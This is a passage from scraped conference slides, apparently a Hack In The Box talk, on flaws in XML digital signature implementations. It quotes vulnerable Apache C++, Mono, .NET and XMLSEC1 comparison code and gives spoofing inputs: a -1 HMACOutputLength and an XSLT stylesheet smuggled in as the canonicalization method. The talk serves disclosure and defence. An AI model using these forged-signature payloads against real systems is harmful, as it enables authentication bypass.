![Page 103: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/103.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
![Page 104: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/104.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 105: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/105.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 106: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/106.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 107: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/107.jpg)
Div Function
![Page 108: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/108.jpg)
Div Function
HMACOutputLength = -1
maxCompare = 0xFFFFFFFF
d.quot = 0, d.rem = -1
maxBytes = 0, maxBits = 0xFFFFFFFF
![Page 109: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/109.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
<HMACOutputLength>-1</HMACOutputLength></SignatureMethod>
...</SignedInfo>
Exploiting
00112233445566778899AABBCCDDEEFF00112233
00
Truncate to 8 bits
![Page 110: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/110.jpg)
DoS Only bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 111: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/111.jpg)
DoS Only bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 112: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/112.jpg)
DoS Only bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 113: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/113.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 114: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/114.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
// Monobool Compare (byte[] expected, byte[] actual) {
for (int i=0; i < l; i++) {if (expected[i] != actual[i])
return false;}return true;
}
![Page 115: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/115.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
// Mono bool Compare (byte[] expected, byte[] actual) {
for (int i=0; i < l; i++) {if (expected[i] != actual[i])
return false;}return true;
}
// .NETbool CheckSignedInfo(KeyedHashAlgorithm macAlg) {
for (int i = 0; i < this.m_signature.SignatureValue.Length; i++){
if (m_signature.SignatureValue[i] != actualHashValue[i]){
return false;}
}return true;
}
![Page 116: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/116.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
// Mono bool Compare (byte[] expected, byte[] actual) {
for (int i=0; i < l; i++) {if (expected[i] != actual[i])
return false;}return true;
}
// .NET bool CheckSignedInfo(KeyedHashAlgorithm macAlg) {
for (int i = 0; i < this.m_signature.SignatureValue.Length; i++){
if (m_signature.SignatureValue[i] != actualHashValue[i]){
return false;}
}return true;
}
// XMLSEC1if((dataSize > 1) && (memcmp(ctx->dgst, data, dataSize - 1) != 0)){
transform->status = xmlSecTransformStatusFail; return(0);
}
transform->status = xmlSecTransformStatusOk;return(0);
![Page 117: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/117.jpg)
Back to the original story...
![Page 118: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/118.jpg)
CVE-2013-1336/CVE-2013-
2172/CVE-2013-2461
• Signature Spoofing through
Canonicalization Algorithm Identifier
• Affected .NET, Apache Java and JRE
• Doesn't work in Mono, due to an "Incompatible Implementation"
![Page 119: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/119.jpg)
<SignedInfo><CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/><SignatureMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference URI="">
<Transforms><Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo>
SignedInfo Element
![Page 120: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/120.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/><SignatureMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference URI="">
<Transforms> <Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>Bo0b5...</DigestValue>
</Reference> </SignedInfo>
SignedInfo Element
![Page 121: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/121.jpg)
<SignedInfo><CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/><SignatureMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> <Reference URI="">
<Transforms> <Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> </Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>Bo0b5...</DigestValue>
</Reference> </SignedInfo>
SignedInfo Element
![Page 122: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/122.jpg)
Algorithm IdentifiersName Type URI Required?
SHA1 Digest http://www.w3.org/2000/09/xmldsig#sha1 Yes
Base64 Encoding http://www.w3.org/2000/09/xmldsig#base64 Yes
HMAC/SHA1 Signature http://www.w3.org/2000/09/xmldsig#hmac-sha1 Yes
DSA/SHA1 Signature http://www.w3.org/2000/09/xmldsig#dsa-sha1 Yes
RSA/SHA1 Signature http://www.w3.org/2000/09/xmldsig#rsa-sha1 No
C14N 1.0 C14N http://www.w3.org/TR/2001/REC-xml-c14n-20010315
Yes
C14N 1.1 C14N http://www.w3.org/2006/12/xml-c14n11 Yes
Envelope Transform http://www.w3.org/2000/09/xmldsig#enveloped-signature
Yes
XPath Transform http://www.w3.org/TR/1999/REC-xpath-19991116 No
XSLT Transform http://www.w3.org/TR/1999/REC-xslt-19991116 No
![Page 123: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/123.jpg)
Extensible?
http://www.w3.org/TR/xmldsig-core/#sec-AlgID
"This specification defines a set of algorithms, their URIs,
and requirements for implementation. Requirements
are specified over implementation, not over
requirements for signature use. Furthermore, the
mechanism is extensible; alternative algorithms may
be used by signature applications."
![Page 124: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/124.jpg)
Creating .NET Canonicalizer
class SignedInfo{
public string CanonicalizationMethod { get; }
public Transform CanonicalizationMethodObject{
get {
return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);}
} }
![Page 125: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/125.jpg)
Creating .NET Canonicalizer
class SignedInfo{
public string CanonicalizationMethod { get; }
public Transform CanonicalizationMethodObject{
get {
return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);}
} }
![Page 126: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/126.jpg)
CryptoConfig?
![Page 127: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/127.jpg)
CryptoConfig?
![Page 128: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/128.jpg)
Derived from Transform
![Page 129: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/129.jpg)
Derived from Transform
![Page 130: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/130.jpg)
Derived from Transform
![Page 131: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/131.jpg)
Derived from Transform
![Page 132: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/132.jpg)
Derived from Transform
![Page 133: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/133.jpg)
Derived from Transform
![Page 134: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/134.jpg)
Exploiting It
Extract
Good Signed XML Document
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo>
Canonicalize
<xsl:stylesheet version="1.0"><xsl:output method="text" /><xsl:template match="/">
<xsl:text disable-output-escaping="yes"><SignedInfo xmlns="http://...</xsl:text>
</xsl:template></xsl:stylesheet>
To X
SLT
Modify Document
Bad Signed XML Document
<good/>
<bad/>
![Page 135: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/135.jpg)
Final XML
<SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" /><xsl:template match="/">
<xsl:text disable-output-escaping="yes"><SignedInfo xmlns="http://...
</xsl:text></xsl:template>
</xsl:stylesheet></CanonicalizationMethod><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
</SignedInfo>
![Page 136: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/136.jpg)
Exploiting It
Bad Signed XML Document
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo>
XSLExtract<xsl:stylesheet>
...</xsl:stylesheet>
C1
4N
Verify Signature
<bad/>
![Page 137: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/137.jpg)
Demo Time!
![Page 138: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/138.jpg)
And the Rest
• Invalid Parsing of Signatures
– Blended Threat between parsers
• Other DoS stuff in .NET and WCF
• Many Lucky "bugs" in Mono
![Page 139: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/139.jpg)
Final Score Sheet
Implementation ParsingIssues
Memory Corruption
Signature Spoofing
Denial of Service
File Stealing
Apache C++ Yes Yes Yes Yes Yes, hilariously!
Apache Java/JRE Yes No Yes Yes Sort of, limited use
XMLSEC1 No No Yes,Kind of
Yes if libxml2 isn't
fixed
No
.NET No No Yes Yes Yes
Mono Lucky Escape
No Yes, should have been
worse
Yes I gave up even trying
![Page 140: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/140.jpg)
Conclusions
• Don't Blindly Trust Your Implementation
• Double Check All References are as
expected
• Double Check All Algorithms are as
expected
• Probably stay away from Apache C++ and Mono
![Page 141: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/141.jpg)
Questions?